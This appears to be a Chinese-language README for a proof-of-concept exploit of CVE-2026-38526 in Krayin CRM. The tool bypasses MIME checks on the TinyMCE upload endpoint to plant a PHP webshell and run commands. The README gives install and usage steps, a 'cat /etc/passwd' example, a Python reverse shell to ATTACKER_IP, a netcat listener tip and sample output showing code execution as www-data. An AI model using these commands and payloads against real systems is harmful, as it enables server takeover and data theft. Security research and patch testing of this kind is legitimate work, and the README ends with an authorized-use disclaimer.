自动利用 Krayin CRM ≤ 2.2.x 的漏洞。此脚本利用 TinyMCE 端点(/admin/tinymce/upload)中的无限制文件上传漏洞,通过伪造 image/jpeg 绕过 MIME 类型验证,上传 PHP webshell,并以 Web 服务器权限执行任意命令。
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2026-38526 |
| 受影响软件 | Krayin CRM ≤ 2.2.x |
| 漏洞类型 | 无限制文件上传 → 远程代码执行 |
| 认证 | 必需(任意有效管理员账户) |
| 端点 | POST /admin/tinymce/upload |
requests 库git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]
| 标志 | 描述 | 示例 |
|---|---|---|
-i | 目标 URL(带或不带 http://) | http://target.com 或 target.com |
-u | 管理员邮箱/用户名 | [email protected] |
-p | 管理员密码 | AdminPassword123! |
-c | 要执行的命令(默认:id) | whoami |
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"
# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"
/admin/tinymce/upload[*] Target: http://target.com
[*] Username: [email protected]
[*] Authenticating...
[+] Authentication successful
[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution
[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────
[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'
身份验证失败:请确认凭据正确且目标上存在该账户。
CSRF 令牌提取失败:请确保目标运行的是存在漏洞的 Krayin CRM,且登录端点可访问。
反向 Shell 无法连接:请确保您的监听器正在运行(nc -lvnp <PORT>),防火墙规则允许出站连接,并且载荷中的 IP/端口正确。
本工具仅用于经授权的安全测试和教育目的。未经授权访问计算机系统属于违法行为。用户全权负责确保在测试任何目标系统之前已获得适当授权。作者不对因使用本工具造成的滥用或损害承担任何责任。
b0nyo - PoC 实现
TREXNEGRO - 漏洞发现